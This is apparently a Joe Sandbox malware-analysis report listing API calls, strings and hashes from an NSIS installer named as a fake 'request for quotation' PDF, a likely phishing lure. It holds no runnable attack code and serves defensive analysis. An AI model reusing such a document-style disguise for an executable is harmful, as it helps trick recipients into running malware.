                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                  • String ID: A
                                                                                                                                  • API String ID: 2624150263-3554254475
                                                                                                                                  • Opcode ID: 7533d7c2dc95967098a321fa3339fb28748da65ff8be7a50b8b52b895c48c278
                                                                                                                                  • Instruction ID: 407ae004ccebb682b028ef0dda1631611b85a4c4b0528499d59b6de2b9b5396a
                                                                                                                                  • Opcode Fuzzy Hash: 7533d7c2dc95967098a321fa3339fb28748da65ff8be7a50b8b52b895c48c278
                                                                                                                                  • Instruction Fuzzy Hash: 9CA171B1900208ABDB11AFA6CD85AAF77B8EF84314F10843BF601B72D1D77C89418B69
                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,00442800,00000400,?,?,00000000,0040353A,?), ref: 00402E1B
                                                                                                                                    • Part of subcall function 00405C2A: GetFileAttributesW.KERNEL32(00000003,00402E2E,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                                    • Part of subcall function 00405C2A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,00440800,00440800,00442800,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67
                                                                                                                                  Strings
                                                                                                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
                                                                                                                                  • soft, xrefs: 00402EDC
                                                                                                                                  • Null, xrefs: 00402EE5
                                                                                                                                  • Error launching installer, xrefs: 00402E3E
                                                                                                                                  • (*B, xrefs: 00402E7C
                                                                                                                                  • Inst, xrefs: 00402ED3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                  • String ID: (*B$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                  • API String ID: 4283519449-2478819026
                                                                                                                                  • Opcode ID: af3239711416cc3f4489103c4f5988a16c87e5acef6a1f1d228726abe2e37e97
                                                                                                                                  • Instruction ID: 7d4f9fc7c678da67c97c1a1890296b71ec8e814f853b941ab64c238268a70fe9
                                                                                                                                  • Opcode Fuzzy Hash: af3239711416cc3f4489103c4f5988a16c87e5acef6a1f1d228726abe2e37e97
                                                                                                                                  • Instruction Fuzzy Hash: AF51F731904205ABDB209F61DE89B9F7BB8EB44394F14403BF904B62C1C7B89D409BAD
                                                                                                                                  APIs
                                                                                                                                  • GetVersion.KERNEL32(00000000,0042C248,?,004051EB,0042C248,00000000,00000000,?), ref: 0040613A
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(00432EA0,00000400), ref: 004061B8
                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(00432EA0,00000400), ref: 004061CB
                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
                                                                                                                                  • SHGetPathFromIDListW.SHELL32(?,00432EA0), ref: 00406215
                                                                                                                                  • CoTaskMemFree.OLE32(?), ref: 00406220
                                                                                                                                  • lstrcatW.KERNEL32(00432EA0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
                                                                                                                                  • lstrlenW.KERNEL32(00432EA0,00000000,0042C248,?,004051EB,0042C248,00000000,00000000,?), ref: 0040629E
                                                                                                                                  Strings
                                                                                                                                  • \Microsoft\Internet Explorer\Quick Launch, xrefs: 0040623E
                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406186
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                  • API String ID: 900638850-730719616
                                                                                                                                  • Opcode ID: b49515e533b40e1408f5d93883df29fa5190ace2cf2b8e5a57d609063371b42f
                                                                                                                                  • Instruction ID: e2b9bd4c7d0941b93a588dc58e8d14d5200dcae9cd5da35c43f1ba43b89dddbc
                                                                                                                                  • Opcode Fuzzy Hash: b49515e533b40e1408f5d93883df29fa5190ace2cf2b8e5a57d609063371b42f
                                                                                                                                  • Instruction Fuzzy Hash: 79610371A00504EBDF20AF64CC40BAE37A5AF55324F16817FE942BA2D0D73D9AA1CB4D
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$wsprintf
                                                                                                                                  • String ID: jA$ jA$... %d%%
                                                                                                                                  • API String ID: 551687249-2167919867
                                                                                                                                  • Opcode ID: e07d926733e31303047b785d6e8e1ef749c31aa3f1888e26d22e6b527b659153
                                                                                                                                  • Instruction ID: 9abceb1f43df10d1a821086e1d45a58eca4464abfa5f2a46825b956852eb5d51
                                                                                                                                  • Opcode Fuzzy Hash: e07d926733e31303047b785d6e8e1ef749c31aa3f1888e26d22e6b527b659153
                                                                                                                                  • Instruction Fuzzy Hash: AF517C71901259EBDB10CF65DA44BAE7BB8AF05766F10417FF811B62C0C7789E40CBAA
                                                                                                                                  APIs
                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 0040419D
                                                                                                                                  • GetSysColor.USER32(00000000), ref: 004041B9
                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 004041C5
                                                                                                                                  • SetBkMode.GDI32(?,?), ref: 004041D1
                                                                                                                                  • GetSysColor.USER32(?), ref: 004041E4
                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 004041F4
                                                                                                                                  • DeleteObject.GDI32(?), ref: 0040420E
                                                                                                                                  • CreateBrushIndirect.GDI32(?), ref: 00404218
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2320649405-0
                                                                                                                                  • Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                                  • Instruction ID: dec6db0c7b043789455d5ba444b9f0b4b6699da27fefac44a21b5edf9a5b929b
                                                                                                                                  • Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                                  • Instruction Fuzzy Hash: E321C3B1500704ABCB219F68EE08B4BBBF8AF40710F04896DF996F66A0C734E944CB64
                                                                                                                                  APIs
                                                                                                                                  • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                                                                                    • Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D21
                                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                  • String ID: 9
                                                                                                                                  • API String ID: 163830602-2366072709
                                                                                                                                  • Opcode ID: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                                                  • Instruction ID: c11c119823ef092d14edb4d445d1eebecf1e4ba29e3308019af08aa6c5ad61e3
                                                                                                                                  • Opcode Fuzzy Hash: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                                                  • Instruction Fuzzy Hash: 43510874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99D42DB69
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(0042C248,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                  • lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                  • lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,759223A0), ref: 0040520F
                                                                                                                                  • SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2531174081-0
                                                                                                                                  • Opcode ID: 8e6bf81ce48c4b2cdbfca5526b135b5755e0331aa1f53bcdb355af2f73056803
                                                                                                                                  • Instruction ID: bea5982b108369c56cf3d35f12f42b62494ffc2cb206b3c5387e037ca996873b
                                                                                                                                  • Opcode Fuzzy Hash: 8e6bf81ce48c4b2cdbfca5526b135b5755e0331aa1f53bcdb355af2f73056803
                                                                                                                                  • Instruction Fuzzy Hash: B2219D71900518BBCB119FA5DD849DFBFB8EF45354F14807AF944B6290C7794A50CFA8
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
                                                                                                                                  • GetMessagePos.USER32 ref: 00404AA1
                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00404ABB
                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
                                                                                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$Send$ClientScreen
                                                                                                                                  • String ID: f
                                                                                                                                  • API String ID: 41195575-1993550816
                                                                                                                                  • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                                  • Instruction ID: 4e6aff0cdf26a8240c2caa3ab5eae10a4373f49143cb0f782fa754f2c80184c8
                                                                                                                                  • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                                  • Instruction Fuzzy Hash: AE015E71A40219BADB00DB94DD85FFEBBBCAF55711F10012BBA51B61D0C7B49A058BA4
                                                                                                                                  APIs
                                                                                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                                                                  • MulDiv.KERNEL32(?,00000064,?), ref: 00402D4D
                                                                                                                                  • wsprintfW.USER32 ref: 00402D5D
                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                                                                  Strings
                                                                                                                                  • verifying installer: %d%%, xrefs: 00402D57
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                  • String ID: verifying installer: %d%%
                                                                                                                                  • API String ID: 1451636040-82062127
                                                                                                                                  • Opcode ID: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                                                  • Instruction ID: 97815700fdd75a8fa64cd4b2fc5eb6b0a03b286ae4c71c47182b2025913274cc
                                                                                                                                  • Opcode Fuzzy Hash: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                                                  • Instruction Fuzzy Hash: 1801447060020DBFEF249F61DE49FEA3B69AB04304F008039FA45B91D0DBB889558F58
                                                                                                                                  APIs
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2667972263-0
                                                                                                                                  • Opcode ID: 9adbd91855f61e1aa42084a324919f92679eaa0def369839d701c2d0f369fcba
                                                                                                                                  • Instruction ID: bba7bc1bbfa323a43f965ccea5c6d76089a10f976336bb633e0bf1cd6394a54a
                                                                                                                                  • Opcode Fuzzy Hash: 9adbd91855f61e1aa42084a324919f92679eaa0def369839d701c2d0f369fcba
                                                                                                                                  • Instruction Fuzzy Hash: E1219E72800114BBDF216FA5CE49D9E7EB9EF09324F24023AF550762E1C7795E41DBA8
                                                                                                                                  APIs
                                                                                                                                  • CharNextW.USER32(0040A300,*?|<>/":,00000000,0043F000,75923420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 0040634C
                                                                                                                                  • CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                                  • CharNextW.USER32(0040A300,0043F000,75923420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406360
                                                                                                                                  • CharPrevW.USER32(0040A300,0040A300,75923420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406373
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Char$Next$Prev
                                                                                                                                  • String ID: *?|<>/":
                                                                                                                                  • API String ID: 589700163-165019052
                                                                                                                                  • Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                                                  • Instruction ID: f5504631107e1e3793a073f133b65ff293a0897d7111eb10bd5d41781883406d
                                                                                                                                  • Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                                                  • Instruction Fuzzy Hash: B611C42690061295DB303B558C84AB762F8EF54750F56843FED86B32D0EB7C9CA2C6ED
                                                                                                                                  APIs
                                                                                                                                  • lstrcatW.KERNEL32(00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017A8
                                                                                                                                  • CompareFileTime.KERNEL32(-00000014,?,0040A5F0,0040A5F0,00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017CD
                                                                                                                                    • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                                    • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                    • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                    • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,759223A0), ref: 0040520F
                                                                                                                                    • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                    • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                    • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                    • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1941528284-0
                                                                                                                                  • Opcode ID: 76a6acc1869b1502df51b2d70689f923f1781407bbca0b7b9e67ba73967ab9b8
                                                                                                                                  • Instruction ID: 02e4f6238df89927c362e8fae2a75ca1a565c16d749b69ec27d3a85cbadddcd8
                                                                                                                                  • Opcode Fuzzy Hash: 76a6acc1869b1502df51b2d70689f923f1781407bbca0b7b9e67ba73967ab9b8
                                                                                                                                  • Instruction Fuzzy Hash: 0941B631900515BACF11BFB5CC45EAF7679EF05328B24423BF522B10E1DB3C86519A6D
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$DeleteEnumOpen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1912718029-0
                                                                                                                                  • Opcode ID: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                                                  • Instruction ID: 923876515d334741f157c0c1a16b9ae25b0374e488e2a62f99a19aca1c1d50f8
                                                                                                                                  • Opcode Fuzzy Hash: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                                                  • Instruction Fuzzy Hash: 4B116A71504119BFEF10AF90DF8CEAE7B79FB54384B10003AF905A11A0D7B49E55AA28
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1849352358-0
